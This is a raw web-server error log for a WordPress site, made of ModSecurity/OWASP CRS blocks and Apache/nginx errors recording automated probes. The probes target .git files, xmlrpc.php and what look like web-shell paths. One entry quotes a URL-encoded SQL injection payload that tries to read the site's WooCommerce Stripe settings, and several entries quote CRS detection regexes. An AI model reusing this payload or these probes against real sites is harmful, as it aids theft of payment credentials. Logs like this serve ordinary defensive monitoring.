ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:user-agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "User-Agent"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZdarvVvgm4Su9PN8NKjlIgAAAMw"] 2024/02/22 00:55:40 [error] 3363#3363: *524428 access forbidden by rule, client: 54.199.142.38, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" [Thu Feb 22 08:03:44.843403 2024] [:error] [pid 16240:tid 140160452736768] [client 192.0.115.196:54948] [client 192.0.115.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:signature. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xOR found within ARGS:signature: 9 fzBkxORbJPaLQ5gPD/yhsmTr8="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZddGMAiGBs-24oOGo6bsGgAAANM"], referer: https://investigacionperu.com/?for=jetpack&jetpack=comms&token=Z5nUQajFXxnH%40s%29G4Tnlh9C%5E6NYFP%28XC%3A1%3A0×tamp=1708607024&nonce=CozHoCcm4E&body-hash=l5MGKDtBMCRLlbhRxcm3udBaUGk%3D&signature=9%2BfzBkxORbJPaLQ5gPD%2FyhsmTr8%3D 2024/02/23 01:15:52 [error] 15500#15500: *543960 access forbidden by rule, client: 23.20.78.37, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" [Fri Feb 23 03:28:19.590949 2024] [:error] [pid 14176:tid 140032140556032] [client 62.72.22.225:54520] [client 62.72.22.225] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(union(.*?)select(.*?)from)))" at ARGS:calculate_attribute_counts[][taxonomy]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "225"] [id "981276"] [msg "Looking for basic sql injection. Common attack string for mysql, oracle and others."] [data "Matched Data: union%20all%20select%201%2Coption_value%20from found within ARGS:calculate_attribute_counts[][taxonomy]: %22%29%20union%20all%20select%201%2Coption_value%20from%20wp_options%20where%20option_name%20like%20%27woocommerce_stripe_settings%27%3B%00"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/wp-json/wc/store/products/collection-data"] [unique_id "ZdhXI27vVRPtS9wJLeGawwAAAJY"] [Fri Feb 23 06:31:10.091600 2024] [autoindex:error] [pid 14792:tid 140032291624704] [client 185.241.208.140:56978] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Feb 23 13:24:42.719627 2024] [:error] [pid 14792:tid 140032148948736] [client 185.241.208.215:37976] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Fri Feb 23 13:25:14.321452 2024] [:error] [pid 14792:tid 140032241268480] [client 185.241.208.215:38094] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Feb 23 13:25:14.491624 2024] [:error] [pid 14174:tid 140032224483072] [client 185.241.208.215:38098] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Feb 24 01:51:09.122104 2024] [:error] [pid 7797:tid 140032199304960] [client 5.188.62.21:52384] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZdmR3ZFjzguIu5u1fY_j4gAAAQ8"] 2024/02/24 06:25:01 [error] 28670#28670: *564103 access forbidden by rule, client: 31.43.185.32, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Sat Feb 24 12:04:05.508433 2024] [autoindex:error] [pid 28749:tid 139721250400000] [client 51.178.146.199:33578] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Sun Feb 25 12:38:37.723758 2024] [:error] [pid 5835:tid 140523922736896] [client 104.239.163.11:59708] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/plugins.php, referer: investigacionperu.com [Mon Feb 26 05:30:47.747228 2024] [autoindex:error] [pid 30458:tid 139857061922560] [client 20.163.41.39:45642] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Feb 26 22:55:52.116756 2024] [autoindex:error] [pid 29064:tid 139857162635008] [client 41.216.188.162:34084] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Wed Feb 28 00:37:54.802112 2024] [:error] [pid 30897:tid 140691082557184] [client 5.188.62.174:50036] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Zd7GskVDtdGsCozvszNAUAAAAUo"] [Wed Feb 28 15:30:37.230185 2024] [:error] [pid 10258:tid 140190383290112] [client 5.188.62.174:37550] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Zd-X7RbvLb8dT3hm4o5KbgAAAJE"] [Wed Feb 28 16:51:31.271184 2024] [:error] [pid 10258:tid 140190467217152] [client 5.188.62.26:39072] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Zd-q4xbvLb8dT3hm4o5K6QAAAIc"] [Wed Feb 28 16:51:57.834299 2024] [:error] [pid 10256:tid 140190600365824] [client 222.255.218.177:39082] [client 222.255.218.177] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Zd-q_V9uS5iMzymOLa2EqgAAAAA"] [Wed Feb 28 18:05:01.066800 2024] [autoindex:error] [pid 10256:tid 140190391682816] [client 20.38.1.181:40896] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Feb 28 19:20:12.592301 2024] [:error] [pid 10258:tid 140190484002560] [client 5.188.62.26:41796] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Zd_NvBbvLb8dT3hm4o5LlQAAAIU"] [Wed Feb 28 20:08:22.785256 2024] [autoindex:error] [pid 10258:tid 140190591973120] [client 41.216.188.162:42522] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Wed Feb 28 22:06:46.139069 2024] [:error] [pid 10257:tid 140190591973120] [client 185.117.3.127:44784] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Wed Feb 28 22:06:59.673520 2024] [:error] [pid 10258:tid 140190475609856] [client 185.117.3.127:44820] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Feb 28 22:06:59.798304 2024] [:error] [pid 10257:tid 140190374897408] [client 185.117.3.127:44822] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Feb 28 22:07:37.970665 2024] [autoindex:error] [pid 10257:tid 140190400075520] [client 185.117.3.127:44932] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Feb 28 22:07:46.131338 2024] [:error] [pid 10256:tid 140190408468224] [client 185.117.3.127:44956] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Feb 28 22:07:46.946034 2024] [autoindex:error] [pid 10256:tid 140190484002560] [client 185.117.3.127:44960] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Feb 28 22:07:47.705575 2024] [autoindex:error] [pid 10256:tid 140190442039040] [client 185.117.3.127:44964] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Feb 28 22:07:53.311034 2024] [:error] [pid 10891:tid 140190358112000] [client 185.117.3.127:44982] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Feb 28 22:07:53.449492 2024] [:error] [pid 10891:tid 140190425253632] [client 185.117.3.127:44984] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Feb 28 22:08:31.017581 2024] [:error] [pid 10891:tid 140190458824448] [client 185.117.3.127:45100] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Wed Feb 28 22:08:44.442392 2024] [:error] [pid 10891:tid 140190400075520] [client 185.117.3.127:45146] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Feb 28 22:08:44.588829 2024] [:error] [pid 10257:tid 140190484002560] [client 185.117.3.127:45148] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Feb 28 22:09:24.686045 2024] [autoindex:error] [pid 10257:tid 140190600365824] [client 185.117.3.127:45268] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Feb 28 22:09:33.977365 2024] [:error] [pid 10891:tid 140190400075520] [client 185.117.3.127:45296] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Feb 28 22:09:34.883928 2024] [autoindex:error] [pid 10891:tid 140190433646336] [client 185.117.3.127:45302] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Feb 28 22:09:35.720918 2024] [autoindex:error] [pid 10258:tid 140190450431744] [client 185.117.3.127:45306] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Feb 28 22:09:41.167074 2024] [:error] [pid 10891:tid 140190349719296] [client 185.117.3.127:45320] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Feb 28 22:09:41.279185 2024] [:error] [pid 10257:tid 140190358112000] [client 185.117.3.127:45322] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Thu Feb 29 03:20:09.827782 2024] [:error] [pid 20973:tid 140492246685440] [client 5.188.62.76:52444] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeA-OUCKp75Nf1Z55dXoEQAAAMI"] [Thu Feb 29 03:20:18.470454 2024] [:error] [pid 20973:tid 140492238292736] [client 178.89.66.86:52446] [client 178.89.66.86] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeA-QkCKp75Nf1Z55dXoEgAAAMM"] [Thu Feb 29 04:41:08.735036 2024] [:error] [pid 20358:tid 140492221507328] [client 5.188.62.21:53532] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeBRNNkWLVt9k5H31nKUJAAAAIU"] [Thu Feb 29 04:48:30.699470 2024] [autoindex:error] [pid 20973:tid 140491995670272] [client 41.216.188.162:53608] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Thu Feb 29 06:25:48.205843 2024] [:error] [pid 20356:tid 140492062811904] [client 5.188.62.174:54922] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeBpvFKVf5KBoze1RosLggAAAA8"] [Thu Feb 29 11:17:47.381812 2024] [:error] [pid 20356:tid 140492121560832] [client 5.188.62.21:60926] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeCuK1KVf5KBoze1RosMRgAAAAg"] [Thu Feb 29 17:53:04.530231 2024] [:error] [pid 20973:tid 140491987277568] [client 5.188.62.21:41658] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeEK0ECKp75Nf1Z55dXvoQAAANg"] [Thu Feb 29 18:00:38.424043 2024] [autoindex:error] [pid 20973:tid 140492229900032] [client 20.223.161.245:41886] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Feb 29 18:00:45.419170 2024] [autoindex:error] [pid 20973:tid 140492221507328] [client 20.223.161.245:41964] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com//wp-includes/js/tinymce/plugins/compat3x/css/index.php [Thu Feb 29 21:16:40.696011 2024] [:error] [pid 20358:tid 140492255078144] [client 5.188.62.174:45492] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeE6iNkWLVt9k5H31nKZKgAAAIE"] [Thu Feb 29 22:54:42.883777 2024] [:error] [pid 20358:tid 140492054419200] [client 5.188.62.26:47118] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeFRgtkWLVt9k5H31nKZxQAAAJA"] [Thu Feb 29 22:55:34.282016 2024] [:error] [pid 20358:tid 140492071204608] [client 14.194.54.194:47124] [client 14.194.54.194] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeFRttkWLVt9k5H31nKZxwAAAI4"] [Fri Mar 01 00:23:23.375375 2024] [:error] [pid 28743:tid 140492121560832] [client 5.188.62.21:48352] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeFmS7vZWxZB4B3jj1Wg0gAAAIg"] [Fri Mar 01 00:55:27.616873 2024] [autoindex:error] [pid 28858:tid 140492138346240] [client 41.216.188.92:49342] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Fri Mar 01 03:39:54.522005 2024] [:error] [pid 3331:tid 139959277147904] [client 5.188.62.26:51718] [client 5.188.62.26] 